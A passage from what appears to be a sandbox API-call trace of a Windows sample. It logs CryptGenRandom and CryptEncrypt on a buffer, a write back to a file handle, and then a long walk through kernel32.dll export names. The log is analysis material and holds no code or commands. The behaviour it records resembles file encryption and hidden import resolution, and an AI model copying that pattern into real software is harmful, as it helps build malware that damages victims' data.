pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.704] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.704] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.705] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.706] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.706] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.706] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.706] CloseHandle (hObject=0x454) returned 1 [0078.707] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.707] CloseHandle (hObject=0x0) returned 0 [0078.707] CloseHandle (hObject=0x450) returned 1 [0078.708] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.708] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.709] GetTickCount () returned 0x114c2c3 [0078.709] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.709] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.709] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.709] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.709] lstrlenA (lpString="kernel32.dll") returned 12 [0078.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.710] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.710] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.710] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.710] lstrlenA (lpString="ADDATOMA") returned 8 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.710] lstrlenA (lpString="ADDATOMW") returned 8 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.710] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.710] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.710] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.710] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.710] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.710] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.710] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.710] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.710] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.710] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.711] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.711] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.711] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.711] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.711] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.711] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.711] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.711] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.711] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.711] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.711] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.711] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.711] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.711] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.711] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.711] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.711] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.711] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.711] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.711] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.712] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.712] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.712] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.712] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.712] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.712] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.712] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.712] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.712] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.712] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.712] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.712] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.712] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.712] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.712] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.712] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.712] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.712] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.712] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.713] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.713] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.713] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.713] lstrlenA (lpString="BEEP") returned 4 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.713] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.713] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.713] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.713] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.713] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.713] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.713] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.713] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.713] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.713] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.713] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.713] lstrlenA (lpString="CANCELIO") returned 8 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.713] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.713] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.713] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.714] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.714] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.714] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.714] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.714] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.714] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.714] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.714] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.714] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.715] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.715] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.715] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.715] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.715] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.715] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.715] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.715] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.715] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.715] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.715] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.715] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.715] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.715] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.716] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.716] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.716] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.716] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.716] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.716] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.716] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.716] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.716] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.716] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.716] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.716] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.716] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.716] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.716] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.716] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.716] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.716] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.716] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.717] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.717] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.717] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.717] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.717] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.717] lstrcpyA (in: lpString1=0x3f2ccf4, 